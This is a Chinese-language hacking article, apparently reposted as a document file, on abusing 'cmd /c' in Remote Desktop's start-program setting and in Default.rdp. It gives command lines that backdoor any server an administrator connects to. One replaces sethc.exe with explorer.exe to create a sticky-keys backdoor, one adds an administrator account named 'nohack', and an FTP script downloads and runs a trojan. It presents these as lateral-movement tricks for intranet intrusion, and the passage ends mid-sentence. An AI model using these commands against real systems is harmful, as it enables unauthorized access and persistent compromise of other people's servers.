windows CMD_C特殊应用.docxVIP

“CMD /C”的特殊应用2009-07-19 13:43作者：白开文章来源：/sdghgk命令行下似乎有数不尽的秘密，稍微挖掘一下就会有意外惊喜。今天跟各位朋友分享一下“CMD /C”的特殊应用，希望能对大家有所帮助。在cmd的帮助文件里，它是这样介绍/c参数的：“CMD [/C string] 执行字符串指定的命令然后中止。请注意，如果字符串有引号，可以接受用命令分隔符 隔开的多个命令。”也就是说它的形式是：CMD /C 字符串。如此说来，我们可以在引号里将多条命令（包括批处理里的语句）用连接起来，达到将多条命令化为一条命令的目的。这样，“CMD /C”就可以在那些只能执行一条命令的地方“大发神威”了。以下是两处应用：一、远程桌面连接在远程桌面连接客户端可以设置3389连接时终端服务器启动的应用程序，估计很多朋友都没注意过它，如图一。在“程序路径和文件名”中，键入程序的路径和文件名。设置以后，由该客户端登陆的服务器就会运行该程序。如果我们在这里写入这样的一个特殊命令会怎样呢？cmd.exe /c copy /Y %SystemRoot%\explorer.exe %SystemRoot%\system32\sethc.execopy /Y %SystemRoot%\explorer.exe %SystemRoot%\system32\dllcache\sethc.exestart explorer.exe或者cmd.exe /c net usernohacknohack /addnet localgroup administrators nohack /addstart explorer.exe服务器端在没有进行特殊设置的情况下，就会被加上后门（如图二）。我之所以说“没有特殊设置”，是因为Windows 2003系统可以通过设置，使程序不运行。在“管理工具”的“终端服务配置”里点击“连接”，然后右击RDP-Tcp，选择属性，点击“环境”标签，可以设置客户端连接远程桌面时运行的程序（如图三），它会替换掉客户端的设置。说了这么多，我估计很多朋友已经想到了它的用处。如果拿到局域网中的一台机器，而管理员又通过这台机器登陆其它服务器，那么我们就可以修改这台机器上的mstsc.exe连接设置，假如管理员登录时没有注意到这里，那么他连接上的服务器就都被安装上了后门。有一点大家需要注意，那就是仅仅做了设置后就关闭mstsc.exe的话，设置并没有保存。我们需要登陆一下，这样设置才会有效。当然，也可以通过另外一种方法——修改Default.rdp文件来实现：在“C:\Documents and Settings\Administrator\My Documents”目录下用记事本打开Default.rdp，在最后添加如下内容（如图四）：alternate shell:s:cmd.exe /c copy /Y %SystemRoot%\explorer.exe %SystemRoot%\system32\sethc.execopy /Y %SystemRoot%\explorer.exe %SystemRoot%\system32\dllcache\sethc.exestart explorer.exe大家利用webshell进行内网渗透时，在这里进行修改不失为一种思路。不过现在的这种利用方式还有一定缺陷，那就是在登录后会有一个黑框出现，目前我没有想到什么好的办法来解决，有思路的朋友可以分享一下。另外，按照这个办法，在利用new用户入侵有3389漏洞的xp系统时，似乎可以在本地这样的设置：cmd.exe /c echo open C:\ftp.txtecho 123C:\ftp.txtecho 456C:\ftp.txtecho get muma.exe C:\muma.exeC:\ftp.txtecho byeC:\ftp.txtftp -s:C:\ftp.txtstart C:\muma.exedel C:\ftp.txtexit这样的话，我们进到对方界面后就不用再匆匆忙忙地手动下载木马了。但是在我找了几台机器测试后，发现实际上并行不通，这条命令在xp系统下似乎不起作用，登陆后还是直接出现桌面，而程序却不运行。最后我在帮助文件里找到了答案：“当连接到运行 Windows XP 的远程计算机的控制台会话时，将不会应用某些客户端选项设置。例如，如果客户端已指定了某个程序在与远程计算机连接时启动，并且已连接到该远程计算机的控制台会话，则该程序将不会启动。而是出现默认的桌面。如果连接到的是控制台会话之外的其他会话，则指定的程序会正常启动。控制台会话是 Windows XP Professional 上唯一可用于远程桌面的会话，所以在建立连接后，